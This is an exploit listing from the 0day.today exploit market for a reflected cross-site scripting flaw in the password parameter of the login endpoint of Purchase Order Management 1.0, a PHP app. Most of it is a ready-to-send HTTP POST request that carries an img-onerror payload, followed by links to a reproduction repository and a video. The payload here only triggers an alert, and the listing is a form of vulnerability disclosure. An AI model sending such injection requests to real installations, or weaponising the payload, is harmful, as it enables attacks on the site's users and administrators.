[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Purchase Order Management 1.0 Cross Site Scripting Vulnerability

Author
nu11secur1ty
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-38246
Category
web applications
Date add
06-03-2023
Platform
php
## Title: Purchase Order Management-1.0 - XSS-Reflected - Information-gathering
## Author: nu11secur1ty
## Vendor: https://www.sourcecodester.com/user/257130/activity
## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected

## Description:
The value of the `password` request parameter is copied into the HTML
document as plain text between tags. The payload uay4w<img src=a
onerror=alert(1)>s4m6g was submitted in the password parameter. This
input was echoed unmodified in the application's response.

STATUS: HIGH Vulnerability

[+]Exploit:
```POST
POST /purchase_order/classes/Login.php?f=login HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=83loqso6i0hee5lpfufibf68o5
Origin: http://localhost
X-Requested-With: XMLHttpRequest
Referer: http://localhost/purchase_order/admin/login.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 37

username=gAjjuMUL&password=k8Z!h2w!V7uay4w%3cimg%20src%3da%20onerror%3dalert(1)%3es4m6g
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0/XSS-Reflected)

## Proof and Exploit:
[href](https://streamable.com/cgw8a4)

#  0day.today [2024-11-15]  #